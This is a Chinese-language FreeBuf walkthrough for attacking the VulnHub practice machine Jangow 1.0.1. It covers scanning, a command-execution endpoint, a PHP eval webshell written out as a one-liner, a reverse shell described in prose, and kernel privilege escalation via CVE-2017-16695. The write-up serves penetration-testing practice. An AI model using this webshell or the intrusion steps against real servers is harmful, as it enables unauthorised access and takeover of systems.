freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

vulnhub 靶机 Jangow: 1.0.1 攻略
闻时间晴未核误 2021-11-26 18:08:09 254830

下载靶机

https://www.vulnhub.com/entry/jangow-101,754/

打开靶机

最好使用VirtualBox,如果使用VMware可能获取不到IP,解决参考:https://blog.csdn.net/qq_41918771/article/details/103636890

打靶

IP发现

nmap扫描网段发现靶机IP:192.168.2.1291637906047_61a0767f16ea27806d1ad.png!small?1637906047833

端口发现1637906213_61a07725467b1125a693b.png!small?1637906214020

访问网站

1637909442_61a083c27eaec7c476045.png!small?1637909444193

扫描网站目录

使用dirb扫描网站目录,发现wordpress地址,但未发现后台登录地址,无果,返回首页查找线索。

1637909524_61a0841487656456d8464.png!small?1637909525378

1637909591_61a084579e4030bbf9861.png!small?1637909592407

首页发现可疑接口

1637909674_61a084aa3e1be5414ebea.png!small?1637909674931

发现接口可执行系统命令,直接写入哥斯拉后门

1637909714_61a084d234efa1713bcbe.png!small?1637909714927

echo '<?phpeval($_POST["pass"]);' > 1.php

1637909825_61a085414a4dd6603fe5f.png!small?1637909825994

哥斯拉链接后门

1637917418_61a0a2ea8ae62f9d4fa40.png!small?1637917419178

反弹shell

哥斯拉webshell不理想,尝试反弹shell

尝试各种反弹shell命令,始终无法反弹,经大佬指点,靶机有防火墙,使用nc反弹shell,但靶机nc不支持-e参数,所以自己上传nc使用,最后,使用443端口,成功反弹shell

1637919399_61a0aaa71b5a6c723d6ba.png!small?1637919399694

调用交互式shell

靶机安装有python3,使用python调用交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

1637919508_61a0ab14c87a48f01533a.png!small?1637919509352

提权

查看用户文件发现md5字符串,解密发现为空密码,并不知道怎么用。

1637920830_61a0b03ec355787e4773b.png!small?1637920831339

1637920911_61a0b08fec5c417eff6d6.png!small?1637920912466

查看配置文件,发现mysql数据库用户名/密码,但无法连接数据库。

1637920961_61a0b0c1dfa1b3a6c5b3a.png!small?1637920962503

使用脚本 linux-exploit-suggester-2.pl 查看系统可能存在的漏洞。

1637921049_61a0b119440308534bb24.png!small?1637921049856

使用CVE-2017-16695漏洞顺利提权。

1637921155_61a0b183b7ace02bd8a2c.png!small?1637921156359





# 渗透测试 # web安全 # 系统安全 # CTF # 网络安全技术
本文为 闻时间晴未核误 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
vuln
闻时间晴未核误 LV.3
这家伙太懒了,还未填写个人描述!
  • 4 文章数
  • 0 关注者
XSS你可能不知道的那些事
2023-08-24
HOST碰撞到底是什么
2021-09-28
WIFI钓鱼姿势
2021-04-23
文章目录